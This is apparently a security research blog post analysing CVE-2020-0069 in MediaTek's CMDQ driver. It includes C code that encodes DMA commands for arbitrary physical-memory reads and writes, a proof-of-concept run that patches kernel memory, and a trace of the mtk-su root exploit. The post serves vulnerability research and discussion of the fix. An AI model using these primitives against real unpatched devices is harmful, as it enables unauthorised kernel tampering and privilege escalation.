CVE-2020-0069: Autopsy of the Most Stable MediaTek Rootkit

Introduction

In March 2020, Google patched a critical vulnerability affecting many MediaTek based devices [1]. This vulnerability had been known by MediaTek since April 2019 (10 months before being fixed), and allows a local attacker without privileges to read and write system memory, leading to privilege escalation. There is even an exploit binary called mtk-su [2] that allows to root many vulnerable devices, which was developed in 2019. At the time of this writing, only few information about this vulnerability is available. So we decided to take a look for ourselves.

Thread

About CVE-2020-0069

According to MediaTek [3], this vulnerability allows a local attacker to achieve arbitrary read/write of physical memory addresses, leading to privilege escalation. The impacted module is the MediaTek Command Queue driver (or CMDQ driver). Using IOCTL on the driver, it is possible for an attacker to allocate a DMA (Direct Memory Access) buffer, and send commands to the DMA hardware in order to have it read and write physical addresses.

As a reminder, Direct Memory Access is a feature allowing a dedicated hardware to send or receive data directly from or to the main memory (the RAM). The aim is to speed up the system by allowing large memory accesses without using too much of the CPU for such task.
This driver seems to allow to communicate from userland with a DMA controller, in order to achieve media or display-related tasks.

There are more than 10 SoCs (System on Chip) impacted by this vulnerability, and even more devices. We have been able to exploit it on the Xiaomi Redmi 6a device (using a MediaTek MT6762M SoC).

The CMDQ driver

There are several versions of sources for this driver available on the web. For this study, we have mainly looked into the Xiaomi Redmi 6a open source kernel [4].
The driver implementation can be found in drivers/misc/mediatek/cmdq. The associated device driver can be either /dev/mtk-cmdq or /proc/mtk-cmdq depending on the SoC
and is available to any application without any permission (at least on the vulnerable devices).

As said before, the driver can be controlled by userland using the IOCTL syscall.

#define CMDQ_IOCTL_EXEC_COMMAND _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 3, 
    struct cmdqCommandStruct)
#define CMDQ_IOCTL_QUERY_USAGE  _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 4, 
    struct cmdqUsageInfoStruct)

/*  */
/* Async operations */
/*  */

#define CMDQ_IOCTL_ASYNC_JOB_EXEC _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 5, 
    struct cmdqJobStruct)
#define CMDQ_IOCTL_ASYNC_JOB_WAIT_AND_CLOSE _IOR(CMDQ_IOCTL_MAGIC_NUMBER, 6, 
    struct cmdqJobResultStruct)

#define CMDQ_IOCTL_ALLOC_WRITE_ADDRESS _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 7, 
    struct cmdqWriteAddressStruct)
#define CMDQ_IOCTL_FREE_WRITE_ADDRESS _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 8, 
    struct cmdqWriteAddressStruct)
#define CMDQ_IOCTL_READ_ADDRESS_VALUE _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 9, 
    struct cmdqReadAddressStruct)

From the available operations, we are going to look into the following ones:

  • CMDQ_IOCTL_ALLOC_WRITE_ADDRESS is used to allocate a DMA buffer, and takes a struct cmdqWriteAddressStruct as argument;
  • CMDQ_IOCTL_FREE_WRITE_ADDRESS is used to free a previously allocated DMA buffer;
  • CMDQ_IOCTL_EXEC_COMMAND allows to send a command buffer to the DMA controller and takes a struct cmdqCommandStruct as argument;
  • CMDQ_IOCTL_READ_ADDRESS_VALUE can be used to read DMA buffer values.

Allocating a DMA buffer

When calling CMDQ_IOCTL_ALLOC_WRITE_ADDRESS, we provide a struct cmdqWriteAddressStruct containing the size of the requested buffer in the field count. We receive a
physical address in the field startPA. We cannot access this address directly from the userland. To access this memory area, we can use CMDQ_IOCTL_EXEC_COMMAND.

It is possible to free a DMA buffer, by calling CMDQ_IOCTL_FREE_WRITE_ADDRESS with the struct cmdqWriteAddressStruct structure from the previous allocation.

Executing commands

CMDQ_IOCTL_EXEC_COMMAND takes a struct cmdqCommandStruct as parameter.

struct cmdqCommandStruct {
 [...]
 /* [IN] pointer to instruction buffer. Use 64-bit for compatibility. */
 /* This must point to an 64-bit aligned u32 array */
 cmdqU32Ptr_t pVABase;
 /* [IN] size of instruction buffer, in bytes. */
 u32 blockSize;
 /* [IN] request to read register values at the end of command */
 struct cmdqReadRegStruct regRequest;
 /* [OUT] register values of regRequest */
 struct cmdqRegValueStruct regValue;
 /* [IN/OUT] physical addresses to read value */
 struct cmdqReadAddressStruct readAddress;
 [...]

As said before, this IOCTL allows to send commands to be executed by the DMA controller. These commands are placed in a userland buffer, whose address has to be put in the field pVABase and its size in the field blockSize.

The field readAddress from the command struct can be used to read values from the DMA buffer after the execution of our commands.
The field readAddress.dmaAddresses points to a userland buffer which contains addresses from our DMA buffer. Its size is referenced by the field readAddress.count. All the addresses will be read by the kernel and the values
will be placed in the userland buffer pointed by the field readAddress.values.

Reading the DMA buffer can also be achieved by using the IOCTL command CMDQ_IOCTL_READ_ADDRESS_VALUE.

Commands description

A command consists of two 32-bit words and is identified by a command code.

enum cmdq_code {
 CMDQ_CODE_READ  = 0x01,
 CMDQ_CODE_MASK = 0x02,
 CMDQ_CODE_MOVE = 0x02,
 CMDQ_CODE_WRITE = 0x04,
 CMDQ_CODE_POLL  = 0x08,
 CMDQ_CODE_JUMP = 0x10,
 CMDQ_CODE_WFE = 0x20,
 CMDQ_CODE_EOC = 0x40,
 [...]

Here is a description of some commands we are going to use.

CMDQ_CODE_WRITE and CMDQ_CODE_READ

READ and WRITE commands format

The write command is used to write a value from a data register at the address from the address register.
The read command reads the value at the address pointed by the address register and places the result into the data register.

Depending on the option bits (TYPE A and TYPE B in the figure), the address can be computed from a value called subsysID placed
in the REG NUMBER field and an offset placed in the VALUE field. The subsysID will then be replaced by an actual physical address referenced
in the kernel DTS.

CMDQ_CODE_MOVE

MOVE command format

This command allows to place a value (up to 48 bits) into a register. This value can be placed either in a data register or address register, and can be any data or an address. This is probably the biggest issue here since no checks are made on the address.

CMDQ_CODE_WFE

WFE command format

WFE stands for Wait For Event and clear. From what we understand, we can use it to block the usage of some registers (pretty much like we would use a mutex). The event flag to be used
with this command is associated with a set of registers we are going to use in the command buffer. For example, for the registers CMDQ_DATA_REG_DEBUG (R7) and
CMDQ_DATA_REG_DEBUG_DST (P11), the event (or token as it is called in the sources) CMDQ_SYNC_TOKEN_GPR_SET_4 has to be used.
We need to use the WFE command at the beginning and at the end of each command buffer.

CMDQ_CODE_EOC

EOC stands for End Of Command. It has to be placed at the end of each command buffer, after the CMDQ_CODE_WFE command, to indicate the end of the command list. It seems to contain a lot of flags
but for our usage we only needed what seems to be the IRQ flag always to be set.

CMDQ_CODE_JUMP

According to the sources comments, it allows to jump into the command buffer by using an offset. We use this command at the very end of each command buffer, after the command CMDQ_CODE_EOC,
always to jump at the offset 0x8, i.e. on the previous command. Our theory is that a prefetch mechanism is implemented in the DMA controller, and this command makes sure to take the CMDQ_CODE_EOC command into account.

The registers

In the command descriptions, we mentioned registers. There are two kinds of registers:

  • value registers (from R0 to R15) that are composed of 32 bits;
  • address registers (from P0 to P7) that are composed of 64 bits.
enum cmdq_gpr_reg {
    /* Value Reg, we use 32-bit */
    /* Address Reg, we use 64-bit */
    /* Note that R0-R15 and P0-P7 actually share same memory */
    /* and R1 cannot be used. */

    CMDQ_DATA_REG_JPEG = 0x00,  /* R0 */
    CMDQ_DATA_REG_JPEG_DST = 0x11,  /* P1 */

    CMDQ_DATA_REG_PQ_COLOR = 0x04,  /* R4 */
    CMDQ_DATA_REG_PQ_COLOR_DST = 0x13,  /* P3 */

    CMDQ_DATA_REG_2D_SHARPNESS_0 = 0x05,    /* R5 */
    CMDQ_DATA_REG_2D_SHARPNESS_0_DST = 0x14,    /* P4 */

    CMDQ_DATA_REG_2D_SHARPNESS_1 = 0x0a,    /* R10 */
    CMDQ_DATA_REG_2D_SHARPNESS_1_DST = 0x16,    /* P6 */

    CMDQ_DATA_REG_DEBUG = 0x0b, /* R11 */
    CMDQ_DATA_REG_DEBUG_DST = 0x17, /* P7 */

Let’s play with the driver

Now that we understand a bit better how the driver works, let’s play with it in order to achieve basic memory reads and writes.

Writing memory

To write a 32-bit value in memory we can use the following commands:

  • MOVE a 32 bit value into the value register;
  • MOVE the address where we want to put our value into the address register;
  • WRITE the value from the value register at the address from the address register.
// move value into CMDQ_DATA_REG_DEBUG
*(uint32_t*)(command->pVABase + command->blockSize) = value;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG << 16
                                                | (pa_address + offset) >> 0x20;
command->blockSize += 8;

// move pa_address into CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = (uint32_t)pa_address;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG_DST << 16
                                                | (pa_address + offset) >> 0x20;
command->blockSize += 8;

//write CMDQ_DATA_REG_DEBUG into CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = CMDQ_DATA_REG_DEBUG;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_WRITE << 24 | 3 << 22
                                                | CMDQ_DATA_REG_DEBUG_DST << 16;
command->blockSize += 8;

Reading memory

Reading a 32-bit value in memory can be done in four commands:

  • MOVE the address to be read (pa_address) into the address register;
  • READ the data at the address pointed by the address register into the value register;
  • MOVE the DMA buffer address (dma_address) into the address register;
  • WRITE the data from the value register into the address from the address register .

We need to place these commands in a previously allocated buffer in the pVABase field of the struct cmdqCommandStruct. The
command buffer size has to be put in the field blockSize.

// move pa_address into CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = (uint32_t)pa_address;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG_DST << 16
                                                | (pa_address + offset) >> 0x20;
command->blockSize += 8;

// read value at CMDQ_DATA_REG_DEBUG_DST into CMDQ_DATA_REG_DEBUG
*(uint32_t*)(command->pVABase + command->blockSize) = CMDQ_DATA_REG_DEBUG;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_READ << 24 | 3 << 22
                                                  | CMDQ_DATA_REG_DEBUG_DST << 16;
command->blockSize += 8;

// move dma_address into CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = (uint32_t)dma_address;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG_DST << 16
                                                | (pa_address + offset) >> 0x20;
command->blockSize += 8;

//write CMDQ_DATA_REG_DEBUG into CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = CMDQ_DATA_REG_DEBUG;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_WRITE << 24 | 3 << 22
                                                  | CMDQ_DATA_REG_DEBUG_DST << 16;

Then we inform the driver that we want to read the values in the DMA buffer by filling the readAddress field:

*(uint32_t*)((uint32_t)command->readAddress.dmaAddresses) = dma_address;
command->readAddress.count = offset;

The result will be written in readAddress.values, which has to be allocated before.

Small PoC

To identify the physical address used by the kernel, one can use the device /proc/iomem (root permission needed).

# cat /proc/iomem
[...]
40000000-545fffff : System RAM
  40008000-415fffff : Kernel code
  41800000-41d669b3 : Kernel data
[...]

These addresses are statically configured and will stay the same over each boot.

The PoC is composed of two programs:

  • a C program that allows basic memory read and writes;
  • a shell script that calls the previous program to search the first occurrence of the “Linux” string in the kernel data memory
    and then replaces it by “minix”.
$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l

Very useful…

We have been able to read and write kernel data memory. And we can do the same with any other system memory region, bypassing the permissions and protections in place in the system.
So, apart from playing small tricks, it is possible to use this vulnerability to modify any part of the system memory such as kernel code and data in order to achieve a privilege
escalation.

The binary mtk-su performs a lot of funny things in the kernel memory using this vulnerability to achieve root.
We are not going to give more details about these kernel exploitation methods used by mtk-su in this post. However, those who want to know more can have a
look to the small tracing library we made. It has to be preloaded when launching mtk-su and it will trace some IOCTLs of the CMDQ driver, such as commands sent to the driver.

$ mkdir mtk-su
$ LD_PRELOAD=./syscall-hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x5a733000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
[...]
$ cat mtk-su/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40928000 into reg 17
READ  address reg 17, data reg b
[...]

The PoC and the tracer library can be found on the Quarkslab’s repository: CVE-2020-0069_poc.

Conclusion

This vulnerability is quite critical. It basically allows any application to read and write all the system memory, including the kernel memory.
We may wonder why this device driver needs to be accessible to every application and not only to the HAL (Hardware Abstraction Layer) and media-related
processes. It would at least add an extra step to achieve root from an application with zero privileges.

According to the sources of the Fire HD 8 Linux kernel [5], the issue has been fixed by parsing all the commands from the command buffer and
by validating each command as well as the addresses and registers in use. For example, only the addresses from the DMA buffer are allowed to be moved to an address register.

As we are not the ones who discovered this vulnerability, we did not talk with MediaTek about this issue. But from a technical point of view, there is nothing that
could have made this vulnerability so long to fix.
According to XDA Developers article [6], Mediatek had a fix since May 2019, but it took 10 months to have it widely patched in end-user devices. Thanks to Android license agreement
Google has been able to force OEMs to update their devices.
This is a great example of patch management complexity in Android ecosystem, where many actors (SoC manufacturers, OEMs, ODMs) have to act together to have a vulnerability fixed on the
end-user device. In the end, it seems that only the legal aspects can force all these actors to integrate fixes.

We might now wonder if all the devices embedding a Mediatek SoC and integrating an AOSP OS version with no Android license agreement will benefit from this fix while their vendors have
no legal obligation to integrate it.

References

[1] https://source.android.com/security/bulletin/2020-03-01
[2] https://forum.xda-developers.com/android/development/amazing-temp-root-mediatek-armv8-t3922213
[3] https://www.xda-developers.com/files/2020/03/CVE-2020-0069.png
[4] https://github.com/MiCode/Xiaomi_Kernel_OpenSource/tree/cactus-p-oss
[5] https://www.amazon.com/gp/help/customer/display.html?tag=androidpolice-20&nodeId=200203720
[6] https://www.xda-developers.com/mediatek-su-rootkit-exploit/

Acknowledgements

Many thanks to my colleagues for proofreading this post.

Original Source